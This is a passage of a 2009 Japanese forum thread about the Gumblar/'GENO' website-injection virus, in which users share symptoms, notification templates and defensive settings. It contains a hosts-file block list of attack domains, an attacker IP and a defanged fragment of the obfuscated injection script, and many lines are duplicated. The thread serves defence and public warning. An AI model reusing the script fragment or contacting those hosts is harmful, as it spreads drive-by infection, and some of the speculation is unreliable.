実際の動作を解析された方の報告によると、一定時間毎に自己を複製して古いものを
自己消滅させて捕捉を困難にする挙動のようですし、現時点では、感染後に元の環境に
戻すことのできるセキュリティソフトは確認できていません。
また、感染ファイルの除去を行なっても、ランダムな文字列でWindowsのレジストリ等を
変更してしまっているなど、原状復帰には至りません。閲覧者向けに告知される場合は、
セキュリティソフトベンダーのを紹介するよりも、PCのリカバリを推奨するのが
良いのではないかと思われます。
以上、要件のみにて失礼致します。
幾つかのサイトの告知ページ等では、セキュリティソフトベンダーを紹介しておりますが、
実際に稼動する本体は、ほとんど日替わりのように入れ替えられている為に、紹介されている
セキュリティソフトにて「除去が行なえるとは言い切れません」。(というか多分無理です)
実際の動作を解析された方の報告によると、一定時間毎に自己を複製して古いものを
自己消滅させて捕捉を困難にする挙動のようですし、現時点では、感染後に元の環境に
戻すことのできるセキュリティソフトは確認できていません。
また、感染ファイルの除去を行なっても、ランダムな文字列でWindowsのレジストリ等を
変更してしまっているなど、原状復帰には至りません。閲覧者向けに告知される場合は、
セキュリティソフトベンダーのを紹介するよりも、PCのリカバリを推奨するのが
良いのではないかと思われます。
以上、要件のみにて失礼致します。
820 :スパムのような警告メール:2009/05/18(月) 10:44:28 ID:ua7Ctj4Z0
(サイト管理者ではなく、レンタルサーバーなどのドメインの管理者宛の場合、下記を頭につける)
ご担当者さま
御社管理下のIP「〜」に開設されているホームページ
「http://〜」において、閲覧者のPCに第三者の
サーバーからマルウェア(コンピュータウイルス)をダウンロードさせる
攻撃スクリプトが挿入されていることを確認しました。
該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
連絡先のメールアドレスを見付けることができませんでした。
管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。
閲覧するだけで感染する形で被害が広がっており、他の御社顧客の中にも
同様の危険を放置しているケースがあるかもしれません。そちらも併せて
ご確認いただければと思います。
攻撃スクリプトは、Avast!のJS:Redirector-H〜JS:Redirector-H9、
SophosのTroj/JSRedir-Rという名称で検出可能なようですので、
御社顧客のサイトを一通りチェックして頂けると有難いです。
他のセキュリティベンダーでは、危険ファイルをダウンロードする
第三者のサーバーIPをFWでのブロック対象にする形で対応している
ようですので、この攻撃スクリプトは検出されないようです。
−−−−−
>該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
>連絡先のメールアドレスを見付けることができませんでした。
>管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。
ここを、対応をお願いします…だけでもいいかも。
ご担当者さま
御社管理下のIP「〜」に開設されているホームページ
「http://〜」において、閲覧者のPCに第三者の
サーバーからマルウェア(コンピュータウイルス)をダウンロードさせる
攻撃スクリプトが挿入されていることを確認しました。
該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
連絡先のメールアドレスを見付けることができませんでした。
管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。
閲覧するだけで感染する形で被害が広がっており、他の御社顧客の中にも
同様の危険を放置しているケースがあるかもしれません。そちらも併せて
ご確認いただければと思います。
攻撃スクリプトは、Avast!のJS:Redirector-H〜JS:Redirector-H9、
SophosのTroj/JSRedir-Rという名称で検出可能なようですので、
御社顧客のサイトを一通りチェックして頂けると有難いです。
他のセキュリティベンダーでは、危険ファイルをダウンロードする
第三者のサーバーIPをFWでのブロック対象にする形で対応している
ようですので、この攻撃スクリプトは検出されないようです。
−−−−−
>該当ページの管理者さまに直接連絡を差し上げようとしましたがざっと眺めたところ、
>連絡先のメールアドレスを見付けることができませんでした。
>管理者からの改善要求の形か、下記の文面の転送をお願いできませんでしょうか。
ここを、対応をお願いします…だけでもいいかも。
821 :192.168.0.774:2009/05/18(月) 10:45:47 ID:ua7Ctj4Z0
822 :192.168.0.774:2009/05/18(月) 10:46:11 ID:RopbQr7x0
同人の方でXP(SP2)、Avast導入、IP遮断済、IE7、Adobeリーダー・フラッシュプレイヤー最新の
環境で感染したって報告あったけど防ぎようがないじゃんもうこれ
環境で感染したって報告あったけど防ぎようがないじゃんもうこれ
823 :192.168.0.774:2009/05/18(月) 10:48:54 ID:yKeLT0rF0
361 :報告 :2009/05/18(月) 10:38:34 ID:Efl7GhePO
(略)
そして自分も只今クリーンインストール中
XP(SP2)、Avast導入、IP遮断済、IE7、Adobeリーダー・フラッシュプレイヤー最新の
環境で感染しました
ジャバスク切りに失敗してたのが原因かも知れません
アホすぐる
■sqlsodbc.chmサイズ変更確認
■cmd.exe、regedit.exeは起動した
■白紙のPDFファイルが一気に10個以上開いてCPU使用率\(^o^)/オワタ
■Windows Updateに接続できない
一応自分の環境ではこういう症状が出ました
(後略)
だってさ
(略)
そして自分も只今クリーンインストール中
XP(SP2)、Avast導入、IP遮断済、IE7、Adobeリーダー・フラッシュプレイヤー最新の
環境で感染しました
ジャバスク切りに失敗してたのが原因かも知れません
アホすぐる
■sqlsodbc.chmサイズ変更確認
■cmd.exe、regedit.exeは起動した
■白紙のPDFファイルが一気に10個以上開いてCPU使用率\(^o^)/オワタ
■Windows Updateに接続できない
一応自分の環境ではこういう症状が出ました
(後略)
だってさ
824 :192.168.0.774:2009/05/18(月) 10:50:08 ID:EdkHVUmF0
>>822
その人はJavaScript無効になってなかったと言ってたような
その人はJavaScript無効になってなかったと言ってたような
825 :192.168.0.774:2009/05/18(月) 10:51:14 ID:gM07vQcn0
誰かPV数の多いたれこみ可能サイトへ情報投稿したらどうだろう?
スラドとかITmediaとかGigazineとか。
スラドとかITmediaとかGigazineとか。
826 :192.168.0.774:2009/05/18(月) 10:51:18 ID:ua7Ctj4Z0
>>822
SP2なところがダメダメな気がしますが
>Avast導入
スクリプトがすり抜けるケースも報告されており、過信はできません。
また、5/14に攻撃サイトのドメインが変更されており、すり抜けが増えている可能性があります。
>IP遮断済
最新の martuz.cn を遮断IPに加えていなかったか、設定が間違っていた可能性が高いです。
>Adobeリーダー・フラッシュプレイヤー最新
PDF、SWF以外にexeも落ちてくるんですが…exeの実行手法がわかりませんけど。
SP2なところがダメダメな気がしますが
>Avast導入
スクリプトがすり抜けるケースも報告されており、過信はできません。
また、5/14に攻撃サイトのドメインが変更されており、すり抜けが増えている可能性があります。
>IP遮断済
最新の martuz.cn を遮断IPに加えていなかったか、設定が間違っていた可能性が高いです。
>Adobeリーダー・フラッシュプレイヤー最新
PDF、SWF以外にexeも落ちてくるんですが…exeの実行手法がわかりませんけど。
827 :192.168.0.774:2009/05/18(月) 10:52:47 ID:GfBjvcuO0
IP遮断してもって、文字通りだとしたら、どういうことよw
リスト全く増えねぇなwジャンル報告だかは普通にあるのにな
リスト全く増えねぇなwジャンル報告だかは普通にあるのにな
828 :192.168.0.774:2009/05/18(月) 10:52:47 ID:lNiEWqwt0
>>823
が本当なら、テキはAdobeの脆弱性で未公表のものをいくつかストックしている可能性があるってことか。
新規脆弱性の波状ゼロデイ攻撃でGENOウイルスを散布されたらシャレにならん。
ひょっとしたらpdfが開くのだって「まだAdobeの脆弱性をつかってますよー」ってう偽装で、本当は
他の脆弱性を使ってるかもしれないし。
なんてことだ
が本当なら、テキはAdobeの脆弱性で未公表のものをいくつかストックしている可能性があるってことか。
新規脆弱性の波状ゼロデイ攻撃でGENOウイルスを散布されたらシャレにならん。
ひょっとしたらpdfが開くのだって「まだAdobeの脆弱性をつかってますよー」ってう偽装で、本当は
他の脆弱性を使ってるかもしれないし。
なんてことだ
829 :192.168.0.774:2009/05/18(月) 10:54:31 ID:yKeLT0rF0
>>826
やっぱexeに引っかかったってことかー
exeを実行させるってことはJS必須?JSオフで画像でも可?
あんまりスキル無いから感染サイト捜索打ち切った方が良いかな。
数個しか見つけれなんだ。役に立たなくてすまん。皆は頑張ってくれ
やっぱexeに引っかかったってことかー
exeを実行させるってことはJS必須?JSオフで画像でも可?
あんまりスキル無いから感染サイト捜索打ち切った方が良いかな。
数個しか見つけれなんだ。役に立たなくてすまん。皆は頑張ってくれ
830 :192.168.0.774:2009/05/18(月) 10:54:51 ID:JmCcr4Q60
>>823
Avast導入 → 何時導入?定義更新は自動任せ?
IP遮断済 → 何時導入?
Adobeリーダー・フラッシュプレイヤー最新 → 何時更新?
この辺が判らんと感染してから更新or対策した可能性が否定できんのでなんとも。
相手さん改良続いてるから他の脆弱性突いてきてる可能性も否定できんし、こりゃ困ったもんだのう…
Avast導入 → 何時導入?定義更新は自動任せ?
IP遮断済 → 何時導入?
Adobeリーダー・フラッシュプレイヤー最新 → 何時更新?
この辺が判らんと感染してから更新or対策した可能性が否定できんのでなんとも。
相手さん改良続いてるから他の脆弱性突いてきてる可能性も否定できんし、こりゃ困ったもんだのう…
831 :192.168.0.774:2009/05/18(月) 10:54:53 ID:BZxCgznZ0
【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/
832 :192.168.0.774:2009/05/18(月) 10:55:47 ID:Wk6IzuQl0
あくまでも未確認情報だから確定事項みたいに書かないように気をつけろよ。
と他の板から見に来てる人に書いておく。
と他の板から見に来てる人に書いておく。
833 :192.168.0.774:2009/05/18(月) 10:56:23 ID:k2CI1leb0
834 :192.168.0.774:2009/05/18(月) 10:56:34 ID:+m52NSIq0
GENOウイルス注意喚起の記事書いたらいつもの10倍のアクセスになった件
そんなつもりで書いたわけじゃないのに
そんなつもりで書いたわけじゃないのに
835 :192.168.0.774:2009/05/18(月) 10:56:36 ID:iven4hyc0
197 名前: スイセン(dion軍)[sage] 投稿日:2009/05/18(月) 10:14:34.01 ID:sn4Pmcsx
ちょっと聞いてくれ
当方、評価用にWindows7(not Virtual XP)を運用しているんだが
試しに当該感染URLを踏んでみたら全然無害でした。
無害どころか、AppLockerとBitLockerのおかげでプロセスに乗せないよう
遮断してくれました。
ただし、これも評価用で入れたNorton 360 3.0 Betaは無反応でしたw
836 :192.168.0.774:2009/05/18(月) 10:59:01 ID:k2CI1leb0
837 :192.168.0.774:2009/05/18(月) 11:00:21 ID:ua7Ctj4Z0
>>835
だから、「現時点では」 Windows2000/XP以外のOSはバージョンチェックではねてるんだってば。
だから、「現時点では」 Windows2000/XP以外のOSはバージョンチェックではねてるんだってば。
838 :192.168.0.774:2009/05/18(月) 11:01:21 ID:zpCoVVcL0
リストに同人サーチ上げた人、リンク繋がってるよ
839 :192.168.0.774:2009/05/18(月) 11:02:12 ID:n6Y+m8FmO
840 :192.168.0.774:2009/05/18(月) 11:02:48 ID:ua7Ctj4Z0
>>836
・IEを使う場合は下記を設定
・信頼できるSite以外ではスクリプトやActiveXを切る
:インターネットオプションのセキュリティの部分で設定可能
・偽装jpg対策(IE6SP2以降限定。IE6SP1以前では出来ない)
:インターネットオプション→セキュリティ→レベルのカスタマイズ
→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする
・IEを使う場合は下記を設定
・信頼できるSite以外ではスクリプトやActiveXを切る
:インターネットオプションのセキュリティの部分で設定可能
・偽装jpg対策(IE6SP2以降限定。IE6SP1以前では出来ない)
:インターネットオプション→セキュリティ→レベルのカスタマイズ
→「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする
841 :192.168.0.774:2009/05/18(月) 11:11:48 ID:UHl6zS+i0
avastいれたんだが、なんか必要な設定とかある?
情弱ですまんお
情弱ですまんお
842 :192.168.0.774:2009/05/18(月) 11:15:54 ID:9Pl8YtKN0
843 :192.168.0.774:2009/05/18(月) 11:20:01 ID:yKeLT0rF0
思いついたんだけど、検体集め&レポーターさん達で
自力で検体作成ってのは無理なんかね?
適当にFTPで非公開サイト作ってワザと感染すれば
色んな検体が集めれるんじゃとか思ったんだけど。ダメ?
自力で検体作成ってのは無理なんかね?
適当にFTPで非公開サイト作ってワザと感染すれば
色んな検体が集めれるんじゃとか思ったんだけど。ダメ?
844 :192.168.0.774:2009/05/18(月) 11:23:00 ID:B1//bRJ30
845 :192.168.0.774:2009/05/18(月) 11:23:10 ID:kA5lVKLe0
846 :192.168.0.774:2009/05/18(月) 11:23:39 ID:eM8L/6820
おはヨーグルト
烏骨鶏はまだ放置だな
烏骨鶏はまだ放置だな
847 :192.168.0.774:2009/05/18(月) 11:24:25 ID:ua7Ctj4Z0
そだ、>>1の
>・再起動時にBSOD
踏んでもならなかったなーと思ってたんだが、(すぐにOS入れなおしたけど)
www3.atword.jp/gnome/の中の人の実験によると、再起動時に、IP遮断していると発生するとのこと。
>あと、 BSoD になる理由が判明
>ユーザ認証直後に 95.129.145.57 へ何らかのアクセスに失敗すると・・・?
>強引に explorer.exeをクラッシュさせてる様子
>
>これってアレだ・・
> 下手にIPブロックすると起動できなくなる・・
> 起動するためには IP情報、その他を抜かれるという・・・
>
>どこまでいやらしいんだオマエハ・・・・
>・再起動時にBSOD
踏んでもならなかったなーと思ってたんだが、(すぐにOS入れなおしたけど)
www3.atword.jp/gnome/の中の人の実験によると、再起動時に、IP遮断していると発生するとのこと。
>あと、 BSoD になる理由が判明
>ユーザ認証直後に 95.129.145.57 へ何らかのアクセスに失敗すると・・・?
>強引に explorer.exeをクラッシュさせてる様子
>
>これってアレだ・・
> 下手にIPブロックすると起動できなくなる・・
> 起動するためには IP情報、その他を抜かれるという・・・
>
>どこまでいやらしいんだオマエハ・・・・
848 :192.168.0.774:2009/05/18(月) 11:26:08 ID:k2CI1leb0
>>843
それが駄目なんだな。
IP変えつつアクセスしないといけないし、どうもサイトごと?に
バラまくものの傾向があって、同じものばかり落ちてくる。
ほぼ同時刻に別サイトで拾うと別のものが落ちてくる。
ドメイン名かIPアドレスかなんかをキーに送り込むファイルを
自動生成してるのかもしれない。
それが駄目なんだな。
IP変えつつアクセスしないといけないし、どうもサイトごと?に
バラまくものの傾向があって、同じものばかり落ちてくる。
ほぼ同時刻に別サイトで拾うと別のものが落ちてくる。
ドメイン名かIPアドレスかなんかをキーに送り込むファイルを
自動生成してるのかもしれない。
849 :192.168.0.774:2009/05/18(月) 11:26:50 ID:uJCPKem80
>>837
え、じゃあWin9x系には無害なの?
え、じゃあWin9x系には無害なの?
850 :192.168.0.774:2009/05/18(月) 11:26:56 ID:xKiO8GiH0
>>841
同人板からですまないが
389 GENO ◆AbjB8MStDM sage New! 2009/05/18(月) 11:00:57 ID:4tM/xy9HO
>>1
報告ってか提案なんだけど、あばすと使いとかでFW入れてない人用に
フリーのFWの紹介載っけてみたらどうだろう
やりすぎかな?
とりあえず自分はコモドのFW導入したので、コモドのまとめWikiどうぞ
つhttp://www4.atwiki.jp/comodopf/
自分もavast使いだから入れてみたよ
今の所軽くて快適
同人板からですまないが
389 GENO ◆AbjB8MStDM sage New! 2009/05/18(月) 11:00:57 ID:4tM/xy9HO
>>1
報告ってか提案なんだけど、あばすと使いとかでFW入れてない人用に
フリーのFWの紹介載っけてみたらどうだろう
やりすぎかな?
とりあえず自分はコモドのFW導入したので、コモドのまとめWikiどうぞ
つhttp://www4.atwiki.jp/comodopf/
自分もavast使いだから入れてみたよ
今の所軽くて快適
851 :192.168.0.774:2009/05/18(月) 11:29:21 ID:Sh8lpjBX0
>>307
うちもよく同じ症状になる(JAVA無効)
うちもよく同じ症状になる(JAVA無効)
852 :192.168.0.774:2009/05/18(月) 11:30:29 ID:yKeLT0rF0
853 :192.168.0.774:2009/05/18(月) 11:30:54 ID:+m52NSIq0
これを機にマジでNokia機を買おうかな
WM機がメインのネット端末だとかなり不安だ
WM機がメインのネット端末だとかなり不安だ
854 :192.168.0.774:2009/05/18(月) 11:31:40 ID:k2CI1leb0
855 :192.168.0.774:2009/05/18(月) 11:33:46 ID:wsKEiiw60
ビビリな俺はnonscriptで全ページプラグイン禁止 リーダーはアンインスコ
一時的JS有効の時もフラッシュは切られてる状態
気休めかなあ 動画サイトはどうしようもないけど・・・
一時的JS有効の時もフラッシュは切られてる状態
気休めかなあ 動画サイトはどうしようもないけど・・・
856 :192.168.0.774:2009/05/18(月) 11:36:01 ID:+m52NSIq0
もう同人板の連中なんてほっとけ!
なんて言ってられないからな・・・そこから広がると目も当てられないから。
なんて言ってられないからな・・・そこから広がると目も当てられないから。
857 :192.168.0.774:2009/05/18(月) 11:36:56 ID:DLMrt4rx0
858 :192.168.0.774:2009/05/18(月) 11:37:22 ID:GfBjvcuO0
これが疫病とかなら言う事聞かなくても村を隔離する、で済むんだがなw
859 :192.168.0.774:2009/05/18(月) 11:38:56 ID:xKiO8GiH0
860 :192.168.0.774:2009/05/18(月) 11:41:54 ID:k2CI1leb0
861 :192.168.0.774:2009/05/18(月) 11:47:36 ID:+m52NSIq0
>>795
ブログでこの下のサイト2個にリンクしてもいいですか?
ブログでこの下のサイト2個にリンクしてもいいですか?
862 :192.168.0.774:2009/05/18(月) 11:48:07 ID:pOfdtuRP0
>>856
気分的にはほっときたいけどそうも言ってられんねw
同人板で「同人サイトなんてヒット数が少ないから影響も少ないはずなのに何故晒す必要があるの?」と言ってた人がいたけど
ヒット数が少なくてもねずみ算式で増えていくし、しかもその数が多いから対象を把握できないことにはどうしようもない
サイト管理者も低スキル、観閲者は更にひどい状況で対策が期待出来ないこともある
気分的にはほっときたいけどそうも言ってられんねw
同人板で「同人サイトなんてヒット数が少ないから影響も少ないはずなのに何故晒す必要があるの?」と言ってた人がいたけど
ヒット数が少なくてもねずみ算式で増えていくし、しかもその数が多いから対象を把握できないことにはどうしようもない
サイト管理者も低スキル、観閲者は更にひどい状況で対策が期待出来ないこともある
863 :192.168.0.774:2009/05/18(月) 11:49:55 ID:xKiO8GiH0
>>861
それ誤爆レスなんだけどなぁ(・ω・`;)
自分は自分のサイトとブログにリンクしたけど、特に問題は起こってないから
リンクしちゃっても大丈夫なんじゃないかな?
まぁ、自分の場合はねらーだってサイトでバレてるのもあるだろうけど
それ誤爆レスなんだけどなぁ(・ω・`;)
自分は自分のサイトとブログにリンクしたけど、特に問題は起こってないから
リンクしちゃっても大丈夫なんじゃないかな?
まぁ、自分の場合はねらーだってサイトでバレてるのもあるだろうけど
864 :192.168.0.774:2009/05/18(月) 11:51:28 ID:yKeLT0rF0
>>857
ナカーマ。気休めなのかなー。
IP増えてもドメインそのままなら有効だからお得
とか思ったんだが。
同人板の元になったノウハウ板のスレの方にリンク集貼られてた。
協力的とまでは言えないがそれでも同人以外で見つけた時とか
一応協力できそうな場合はリンク集に放り込んでくれるってさ。
貼った人の書き方もあるだろうけど向こうは穏やかだった。
感染しても活動的なとこならすぐ対処しちゃうわけでなかなか難しいんだな
ナカーマ。気休めなのかなー。
IP増えてもドメインそのままなら有効だからお得
とか思ったんだが。
同人板の元になったノウハウ板のスレの方にリンク集貼られてた。
協力的とまでは言えないがそれでも同人以外で見つけた時とか
一応協力できそうな場合はリンク集に放り込んでくれるってさ。
貼った人の書き方もあるだろうけど向こうは穏やかだった。
感染しても活動的なとこならすぐ対処しちゃうわけでなかなか難しいんだな
865 :192.168.0.774:2009/05/18(月) 11:52:36 ID:J2AfAwvy0
(){e●val(unes●cape(('Sc●ript(t,'●%')))})(/./●g);
avast!ってこれに反応するのね
avast!ってこれに反応するのね
866 :192.168.0.774:2009/05/18(月) 11:55:17 ID:gw0F+TVl0
867 :192.168.0.774:2009/05/18(月) 11:55:57 ID:+m52NSIq0
>>863
ありがとう。遠慮なくさせていただきます。
ありがとう。遠慮なくさせていただきます。
868 :192.168.0.774:2009/05/18(月) 11:56:55 ID:lbjdJxFz0
>>855
さらにビビリな人はcookieSafeとか使って、cookieも許可制にしておく。
普通に手動で設定もできるけどcookiesafeだとステータスバーとかからボタン押すだけなので設定が楽。
さらにビビリな人はcookieSafeとか使って、cookieも許可制にしておく。
普通に手動で設定もできるけどcookiesafeだとステータスバーとかからボタン押すだけなので設定が楽。
869 :192.168.0.774:2009/05/18(月) 11:58:32 ID:yKeLT0rF0
クッキー設定は常に高だぜ。
クッキー要のところでしょっちゅう躓いてるわorz
クッキー要のところでしょっちゅう躓いてるわorz
870 :192.168.0.774:2009/05/18(月) 12:03:15 ID:834BtslA0
>>861
初心者まとめの方の管理者です。
あまりねらっぽくないように作ったつもりなので(ギコナビとか見えるけど)リンクしても大丈夫だと思います。
不安を煽るような文章がないかどうか、分かりにくいところなどがありましたら連絡よろしくお願いします。
初心者まとめの方の管理者です。
あまりねらっぽくないように作ったつもりなので(ギコナビとか見えるけど)リンクしても大丈夫だと思います。
不安を煽るような文章がないかどうか、分かりにくいところなどがありましたら連絡よろしくお願いします。
871 :192.168.0.774:2009/05/18(月) 12:04:57 ID:+JwqLcuL0
hostsファイルは#出始まるのはコメント扱いになるんですよね?
てことは自分でわかるようにメモ書きしても大丈夫ですか
# GENOウイルス対策5月18日
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
てことは自分でわかるようにメモ書きしても大丈夫ですか
# GENOウイルス対策5月18日
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
872 :192.168.0.774:2009/05/18(月) 12:07:57 ID:yKeLT0rF0
>>871
俺もそうしてる
俺もそうしてる
873 :192.168.0.774:2009/05/18(月) 12:09:44 ID:wU1qChfhP
874 :192.168.0.774:2009/05/18(月) 12:11:12 ID:+JwqLcuL0
>>872-873
ありがとうございます、書き換えときます
ありがとうございます、書き換えときます
875 :192.168.0.774:2009/05/18(月) 12:14:41 ID:gw0F+TVl0
876 :192.168.0.774:2009/05/18(月) 12:21:44 ID:+m52NSIq0
877 :192.168.0.774:2009/05/18(月) 12:23:02 ID:wU1qChfhP
878 :192.168.0.774:2009/05/18(月) 12:26:53 ID:7eAX9wM+0
ただいま産業
879 :192.168.0.774:2009/05/18(月) 12:30:33 ID:eM8L/6820
難読化スクリプトにに google Chrome は除外するように書いてあるんですね
怪しいサイトをgoogleに自動送信されるのを避けるためか?
怪しいサイトをgoogleに自動送信されるのを避けるためか?
880 :192.168.0.774:2009/05/18(月) 12:43:02 ID:NNK7xlMd0
とりあえずブラウズする場合は火狐にNoscript入れときゃいい話だろ?
そこまであわてる話じゃない
そこまであわてる話じゃない
881 :192.168.0.774:2009/05/18(月) 13:00:59 ID:ua7Ctj4Z0
>>875
現在使用されているのは martuz.cn なので、それだけ入ってればいい。
前の2つはおまじない。
またドメイン変更される可能性は十分あるし、(無いとは思うが)前の名前に戻される可能性もあるので
履歴みたいなもんだが、のこしといていいよ。実害ないし。
現在使用されているのは martuz.cn なので、それだけ入ってればいい。
前の2つはおまじない。
またドメイン変更される可能性は十分あるし、(無いとは思うが)前の名前に戻される可能性もあるので
履歴みたいなもんだが、のこしといていいよ。実害ないし。
882 :192.168.0.774:2009/05/18(月) 13:06:08 ID:gw0F+TVl0
883 :192.168.0.774:2009/05/18(月) 13:06:43 ID:+m52NSIq0
感染していないPCなら、最低限これやっとけば今の所は安心。
・Windows Update(Microsoft Update)をして、システムを最新の状態にする。
・Adobe Reader を最新(9.1.1)にするか、アンインストールする。
最新にした場合→[編集(E)] -> [環境設定(N)...] -> [JavaScript] -> [Acrobat JavaScript を使用(J)]のチェックを外す。
・Adobe Flash Player をブラウザごとに最新(10.0.22.87)にする。
・ブラウザを Firefox に統一し、NoScript(アドオン)を導入する。
(もしくは、[ツール(T)] -> [オプション(O)...] -> [コンテンツ] -> [JavaScript を有効にする(J)]のチェックを外す。
・C:\WINDOWS\system32\drivers\etc にある hosts ファイルに以下を追加
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
・Windows Update(Microsoft Update)をして、システムを最新の状態にする。
・Adobe Reader を最新(9.1.1)にするか、アンインストールする。
最新にした場合→[編集(E)] -> [環境設定(N)...] -> [JavaScript] -> [Acrobat JavaScript を使用(J)]のチェックを外す。
・Adobe Flash Player をブラウザごとに最新(10.0.22.87)にする。
・ブラウザを Firefox に統一し、NoScript(アドオン)を導入する。
(もしくは、[ツール(T)] -> [オプション(O)...] -> [コンテンツ] -> [JavaScript を有効にする(J)]のチェックを外す。
・C:\WINDOWS\system32\drivers\etc にある hosts ファイルに以下を追加
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
884 :192.168.0.774:2009/05/18(月) 13:07:00 ID:eM8L/6820
885 :192.168.0.774:2009/05/18(月) 13:07:12 ID:qnzegN6T0
ここはやっぱまったりしてんな
886 :192.168.0.774:2009/05/18(月) 13:07:21 ID:ua7Ctj4Z0
感染サイトを拾っていて気付いたこと。
<body>とか<BODY>だと、スクリプトが挿入されているが、<BODY bgcolor=#dddddd>のように記載されている
ページに限っては、感染者のサイトであってもスクリプトが挿入されていない。
まかりまちがって気づかないうちに感染した時対策のおまじないとしてはありかもしれん。
phpとかjsも使ってるページだと、おまじないのしようがないけど。
<body>とか<BODY>だと、スクリプトが挿入されているが、<BODY bgcolor=#dddddd>のように記載されている
ページに限っては、感染者のサイトであってもスクリプトが挿入されていない。
まかりまちがって気づかないうちに感染した時対策のおまじないとしてはありかもしれん。
phpとかjsも使ってるページだと、おまじないのしようがないけど。
887 :192.168.0.774:2009/05/18(月) 13:07:36 ID:+m52NSIq0
他スレへの注意喚起コピペ用を作成してみました。
888 :192.168.0.774:2009/05/18(月) 13:08:28 ID:ua7Ctj4Z0
889 :192.168.0.774:2009/05/18(月) 13:10:08 ID:ua7Ctj4Z0
>>886
訂正…ごめん、そのおまじない無効だわ。その形式でも入ってるページあった。orz
訂正…ごめん、そのおまじない無効だわ。その形式でも入ってるページあった。orz
890 :192.168.0.774:2009/05/18(月) 13:11:31 ID:k2CI1leb0
>>881
cnドメインって20円くらいらしいから、どんどん増殖するんだろうな。
hosts書き換えはお手軽でいいんだけど、以前拾ったスクリプトでは
IPが書き込まれてるものもあったから、hostsだけだと安心できない
んだよね。
cnドメインって20円くらいらしいから、どんどん増殖するんだろうな。
hosts書き換えはお手軽でいいんだけど、以前拾ったスクリプトでは
IPが書き込まれてるものもあったから、hostsだけだと安心できない
んだよね。
891 :192.168.0.774:2009/05/18(月) 13:12:20 ID:DC1VgNqQ0
>>884
429 名前: ミツバツツジ(北海道)[] 投稿日:2009/05/18(月) 12:48:44.35 ID:EpvayYrU
■ウィルス感染対策済のお知らせ
2009/05/16の朝海外サイトからの攻撃でウィルスを仕込まれご心配をおかけしましたが
すべてクリアし、また対策も済んでおりますのでご安心ください。
http://www.seibidoshuppan.co.jp/new/html/osirase.html
429 名前: ミツバツツジ(北海道)[] 投稿日:2009/05/18(月) 12:48:44.35 ID:EpvayYrU
■ウィルス感染対策済のお知らせ
2009/05/16の朝海外サイトからの攻撃でウィルスを仕込まれご心配をおかけしましたが
すべてクリアし、また対策も済んでおりますのでご安心ください。
http://www.seibidoshuppan.co.jp/new/html/osirase.html
892 :192.168.0.774:2009/05/18(月) 13:13:55 ID:eM8L/6820
>>888
お手数かけました、ありがとうございます。
最近はお年寄りもインターネットで買い物するようになってきましたが
セキュリティに関しては全く分からないという方が多いと思います。
それで早くサイトを修正してもらわないと、感染者がますます増える気がして
心配しています。
お手数かけました、ありがとうございます。
最近はお年寄りもインターネットで買い物するようになってきましたが
セキュリティに関しては全く分からないという方が多いと思います。
それで早くサイトを修正してもらわないと、感染者がますます増える気がして
心配しています。
893 :192.168.0.774:2009/05/18(月) 13:17:13 ID:yKeLT0rF0
894 :192.168.0.774:2009/05/18(月) 13:22:26 ID:ABiZoUCL0
あれ?ソース見る限りまだ直ってないみたいだけど……
895 :192.168.0.774:2009/05/18(月) 13:23:37 ID:bJKwd5tS0
チェッカーでは0%
896 :192.168.0.774:2009/05/18(月) 13:23:38 ID:xKiO8GiH0
897 :192.168.0.774:2009/05/18(月) 13:27:49 ID:wU1qChfhP
Opera での flash の切り方
・F12叩く → JavaScriptかプラグインを無効にする
・plugin-ignore.ini(C:\Program Files\Opera\defaults\) を開いて以下を追加
NPSWF32.dll = flash
flash だけ切りたい人は下、そうでない人は上の方法で
・F12叩く → JavaScriptかプラグインを無効にする
・plugin-ignore.ini(C:\Program Files\Opera\defaults\) を開いて以下を追加
NPSWF32.dll = flash
flash だけ切りたい人は下、そうでない人は上の方法で
898 :192.168.0.774:2009/05/18(月) 13:28:04 ID:xSUvMAHu0
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
これをそのままコピペすればいいんですか?
hostsファイル中開いたら既にえらいたくさん指定してあったんですが
一番下に付け加えればいいんでしょうか
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn
これをそのままコピペすればいいんですか?
hostsファイル中開いたら既にえらいたくさん指定してあったんですが
一番下に付け加えればいいんでしょうか
899 :192.168.0.774:2009/05/18(月) 13:28:08 ID:ABiZoUCL0
ああ、キャッシュ見てたわ
これは失敬
これは失敬
900 :192.168.0.774:2009/05/18(月) 13:28:26 ID:lbjdJxFz0
901 :192.168.0.774:2009/05/18(月) 13:30:12 ID:rNK1DQEo0
902 :192.168.0.774:2009/05/18(月) 13:32:18 ID:xKiO8GiH0
903 :192.168.0.774:2009/05/18(月) 13:32:24 ID:+m52NSIq0
>>898
127.0.0.1 localhost の下でいいよ
127.0.0.1 localhost の下でいいよ
904 :192.168.0.774:2009/05/18(月) 13:32:47 ID:ua7Ctj4Z0
seibidoshuppan の件
WebARENA Suite 担当者より返答。
>現在の状況、およびウイルスの対策につきまして該当ホームページの
>管理者さまへは連絡をさせて頂き、改善のご検討並びにご対応をいただいております。
WebARENA Suite 担当者より返答。
>現在の状況、およびウイルスの対策につきまして該当ホームページの
>管理者さまへは連絡をさせて頂き、改善のご検討並びにご対応をいただいております。
905 :192.168.0.774:2009/05/18(月) 13:33:55 ID:rNK1DQEo0
906 :192.168.0.774:2009/05/18(月) 13:34:34 ID:xSUvMAHu0
>903
ありがとうございます
